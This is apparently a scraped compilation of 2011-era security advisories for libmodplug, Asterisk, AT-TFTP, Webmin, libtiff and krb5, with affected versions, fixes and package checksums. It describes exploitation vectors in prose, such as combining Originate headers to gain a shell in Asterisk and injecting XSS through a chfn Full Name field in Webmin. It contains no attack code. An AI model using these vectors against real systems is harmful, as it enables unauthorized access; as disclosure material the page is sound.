- kdelibs-devel-4.3.4-11.el6_0.2.i686.rpm
- kdelibs-devel-4.3.4-11.el6_0.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- Additional links:
- Name of Program: libmodplug: Execute arbitrary code/commands - Remote/unauthenticated
- Developer website:
- Thread: High
-
Overview:
M. Lucinskij and P. Tumenas discovered a buffer overflow in the code for processing S3M tracker files in the Modplug tracker music library, which may result in the execution of arbitrary code.
This advisory references vulnerabilities in products which run on platforms other than Debian.
-
Solution:
It is recommended that administrators running libmodplug check for an updated version of the software for their operating system.
For the oldstable distribution (lenny), this problem has been fixed in version 0.8.4-1+lenny2.
For the stable distribution (squeeze), this problem has been fixed in version 1:0.8.8.1-1+squeeze1.
For the unstable distribution (sid), this problem has been fixed in version 1:0.8.8.2-1.
We recommend that you upgrade your libmodplug packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/
- Additional links:
- Name of Program: AST-2011-006: Asterisk Manager User Shell Access
- Developer website:
- Thread: High
-
Overview:
It is possible for a user of the Asterisk Manager Interface to bypass a security check and execute shell commands when they should not have that ability. Sending the "Async" header together with the "Application" header during an Originate action allows authenticated manager users to execute shell commands. Only users with the "system" privilege should be able to do this.
Affected Versions:
Asterisk Open Source 1.4.x All versions
Asterisk Open Source 1.6.1.x All versions
Asterisk Open Source 1.6.2.x All versions
Asterisk Open Source 1.8.x All versions
Asterisk Business Edition C.x.x All versions
-
Solution:
Asterisk now performs the proper access check where appropriate during the originate manager action.
Corrected In:
Asterisk Open Source 1.4.40.1, 1.6.1.25, 1.6.2.17.3, 1.8.3.3
Asterisk Business Edition C.3.6.4
Patches:
http://downloads.asterisk.org/pub/security/AST-2011-006-1.4.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.6.1.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.6.2.diff
http://downloads.asterisk.org/pub/security/AST-2011-006-1.8.diff
- Additional links:
- Name of Program: AT-TFTP Server v1.8 Remote Denial of Service Vulnerability
- Developer website:
- Thread: High
- POC: Download ↓
-
Overview:
The vulnerability is caused by an error in the "TFTPD.EXE" which causes the server to crash when no acknowledgement response is sent back to the server after a successful 'read'.
Successful exploitation could allow an attacker to crash a vulnerable server.
-
Solution:
Not available.
- Additional links:
- Name of Program: XSS vulnerability in Webmin
- Developer website:
- Thread: Medium
- POC: Download ↓
-
Overview:
Webmin is affected by an XSS vulnerability in all versions prior to and including 1.540. Webmin fails to sanitize $real in useradmin/index.cgi. $real is the "Full Name" field of the user's finger information. useradmin/index.cgi is the control panel of the "Users & Groups" section in Webmin.
An attacker with a normal user account on the victim's machine could change that account's Full Name with the chfn command, inject XSS, and thereby execute commands as root when an administrator views the page.
-
Solution:
The updated packages have been patched to correct this issue.
- Additional links:
- Name of Program: [ MDVSA-2011:078 ] libtiff
- Developer website:
- Thread: Medium
-
Overview:
A vulnerability has been found and corrected in libtiff: The libtiff OJPEG decoder contains a heap buffer overflow when decoding certain malformed data (CVE-2009-5022).
-
Solution:
The updated packages have been patched to correct this issue.
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact: security_(at)_mandriva.com
Updated Packages:
Mandriva Linux 2010.0:
9ec055d6e65fc69a8d38018f9eb51186 2010.0/i586/libtiff3-3.9.1-4.5mdv2010.0.i586.rpm
f35c40e4194cdcd1e256ea6f624a5027 2010.0/i586/libtiff-devel-3.9.1-4.5mdv2010.0.i586.rpm
1552ac043a818f4c46867d718bb1ff1f 2010.0/i586/libtiff-progs-3.9.1-4.5mdv2010.0.i586.rpm
901b333f9dde4e93395f20eeba7b7d47 2010.0/i586/libtiff-static-devel-3.9.1-4.5mdv2010.0.i586.rpm
b64875e20ffc7ec59c53ba2dc39d217c 2010.0/SRPMS/libtiff-3.9.1-4.5mdv2010.0.src.rpm
Mandriva Linux 2010.0/X86_64:
134243d2e76811bbd44c01d2b78a0e9d 2010.0/x86_64/lib64tiff3-3.9.1-4.5mdv2010.0.x86_64.rpm
10e9e28ba162574c020a5bf9405a98d7 2010.0/x86_64/lib64tiff-devel-3.9.1-4.5mdv2010.0.x86_64.rpm
3326ee29f69655147a272d8ecedb32c8 2010.0/x86_64/lib64tiff-static-devel-3.9.1-4.5mdv2010.0.x86_64.rpm
bd9b80e752f4d93fae3f2841331eb08c 2010.0/x86_64/libtiff-progs-3.9.1-4.5mdv2010.0.x86_64.rpm
b64875e20ffc7ec59c53ba2dc39d217c 2010.0/SRPMS/libtiff-3.9.1-4.5mdv2010.0.src.rpm
Mandriva Linux 2010.1:
7c8b520061e66c9127665190fd617f01 2010.1/i586/libtiff3-3.9.2-2.5mdv2010.2.i586.rpm
5113de338fa1a1f7bb10b5e2a2787ba2 2010.1/i586/libtiff-devel-3.9.2-2.5mdv2010.2.i586.rpm
402a16e674507124f81960a39277ec46 2010.1/i586/libtiff-progs-3.9.2-2.5mdv2010.2.i586.rpm
4b9a7d665d38b4481d522acc2c724704 2010.1/i586/libtiff-static-devel-3.9.2-2.5mdv2010.2.i586.rpm
f891b93309f0014bef4b98f2fdb1f451 2010.1/SRPMS/libtiff-3.9.2-2.5mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
1ce63cd7f03fe16b3102ec11837dc0bc 2010.1/x86_64/lib64tiff3-3.9.2-2.5mdv2010.2.x86_64.rpm
2bf5c69232a80db7a33c5e9b2dc9b985 2010.1/x86_64/lib64tiff-devel-3.9.2-2.5mdv2010.2.x86_64.rpm
50be134d1c47764a7bc0ffe9102f6eec 2010.1/x86_64/lib64tiff-static-devel-3.9.2-2.5mdv2010.2.x86_64.rpm
85ab69bff389fe697ea79ff212d616de 2010.1/x86_64/libtiff-progs-3.9.2-2.5mdv2010.2.x86_64.rpm
f891b93309f0014bef4b98f2fdb1f451 2010.1/SRPMS/libtiff-3.9.2-2.5mdv2010.2.src.rpm
- Additional links:
- Name of Program: [ MDVSA-2011:077 ] krb5
- Developer website:
- Thread: Medium
-
Overview:
A vulnerability has been found and corrected in krb5:
The process_chpw_request function in schpw.c in the password-changing functionality in kadmind in MIT Kerberos 5 (aka krb5) 1.7 through 1.9 frees an invalid pointer, which allows remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via a crafted request that triggers an error condition (CVE-2011-0285).
-
Solution:
The updated packages have been patched to correct this issue.
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact: security_(at)_mandriva.com
Updated Packages:
Mandriva Linux 2010.1:
a3beaa4210ef88324b1f7403fe66d49b 2010.1/i586/krb5-1.8.1-5.5mdv2010.2.i586.rpm
5ef9a8a2b65c3cd54237bd486f5f3ea4 2010.1/i586/krb5-pkinit-openssl-1.8.1-5.5mdv2010.2.i586.rpm
53c539adf79bf75de0a69776a41ce9df 2010.1/i586/krb5-server-1.8.1-5.5mdv2010.2.i586.rpm
0d2ec063ef260df774b0fea3a9d7fe63 2010.1/i586/krb5-server-ldap-1.8.1-5.5mdv2010.2.i586.rpm
ad07be92c68b3e9b8a7602e19aa8ab6e 2010.1/i586/krb5-workstation-1.8.1-5.5mdv2010.2.i586.rpm
732f0d7c394a867a71503fb5533c598e 2010.1/i586/libkrb53-1.8.1-5.5mdv2010.2.i586.rpm
363a6990320f5e1bcde2a894521b49f7 2010.1/i586/libkrb53-devel-1.8.1-5.5mdv2010.2.i586.rpm
7e2a03d05b7f86c1ec880eb26c156726 2010.1/SRPMS/krb5-1.8.1-5.5mdv2010.2.src.rpm
Mandriva Linux 2010.1/X86_64:
4e79aa59df474ecc0472c1201d5e373b 2010.1/x86_64/krb5-1.8.1-5.5mdv2010.2.x86_64.rpm
6f66367684ad4633aedc9427153d2a5a 2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.5mdv2010.2.x86_64.rpm
41b1af27fd23b3ede880484cd3775688 2010.1/x86_64/krb5-server-1.8.1-5.5mdv2010.2.x86_64.rpm
b5d9b7db106f4df3501a527054a1b5e2 2010.1/x86_64/krb5-server-ldap-1.8.1-5.5mdv2010.2.x86_64.rpm
78964ab9b21c5cc2ddb7e7d09f5496ce 2010.1/x86_64/krb5-workstation-1.8.1-5.5mdv2010.2.x86_64.rpm
715dad0872aac4d013dec2b5f022fe70 2010.1/x86_64/lib64krb53-1.8.1-5.5mdv2010.2.x86_64.rpm
3d605d0edfff276d65d41c5d5ed8eef2 2010.1/x86_64/lib64krb53-devel-1.8.1-5.5mdv2010.2.x86_64.rpm
7e2a03d05b7f86c1ec880eb26c156726 2010.1/SRPMS/krb5-1.8.1-5.5mdv2010.2.src.rpm
Mandriva Enterprise Server 5:
62e270c8bb4276b9883f5fad04373ea4 mes5/i586/krb5-1.8.1-0.6mdvmes5.2.i586.rpm
ef7eb35fda701aae33c23cdd41b2566e mes5/i586/krb5-pkinit-openssl-1.8.1-0.6mdvmes5.2.i586.rpm
4a19294f600f7f5fa40defc2bba50089 mes5/i586/krb5-server-1.8.1-0.6mdvmes5.2.i586.rpm
2fe89c0a2a2a0618f1c363c622dcaa68 mes5/i586/krb5-server-ldap-1.8.1-0.6mdvmes5.2.i586.rpm
1809ee8a5570aabe32e43f26686b4ab1 mes5/i586/krb5-workstation-1.8.1-0.6mdvmes5.2.i586.rpm
a8fe576ff818ba02c9c0f8f9665999f8 mes5/i586/libkrb53-1.8.1-0.6mdvmes5.2.i586.rpm
412db60ca1427b5d9f31f387144870c9 mes5/i586/libkrb53-devel-1.8.1-0.6mdvmes5.2.i586.rpm
1a51198ce51d8801ea24af9d0a80a854 mes5/SRPMS/krb5-1.8.1-0.6mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64:
f7075001482119db8d21c94b6ef334d9 mes5/x86_64/krb5-1.8.1-0.6mdvmes5.2.x86_64.rpm
2c0c2882bb89b432f103fad9431ecbf8 mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.6mdvmes5.2.x86_64.rpm
354082671bb193faaf025ecd33a8d5dd mes5/x86_64/krb5-server-1.8.1-0.6mdvmes5.2.x86_64.rpm
9697894ff2bc038bc5a06c29be265e17 mes5/x86_64/krb5-server-ldap-1.8.1-0.6mdvmes5.2.x86_64.rpm
4592d2d5e020e6efbfe469fd23bc4265 mes5/x86_64/krb5-workstation-1.8.1-0.6mdvmes5.2.x86_64.rpm
50e1b81524aba4f09bc2c60307d1b4b3 mes5/x86_64/lib64krb53-1.8.1-0.6mdvmes5.2.x86_64.rpm
b8f5f879971561726b677e989384c1b6 mes5/x86_64/lib64krb53-devel-1.8.1-0.6mdvmes5.2.x86_64.rpm
1a51198ce51d8801ea24af9d0a80a854 mes5/SRPMS/krb5-1.8.1-0.6mdvmes5.2.src.rpm
- Additional links: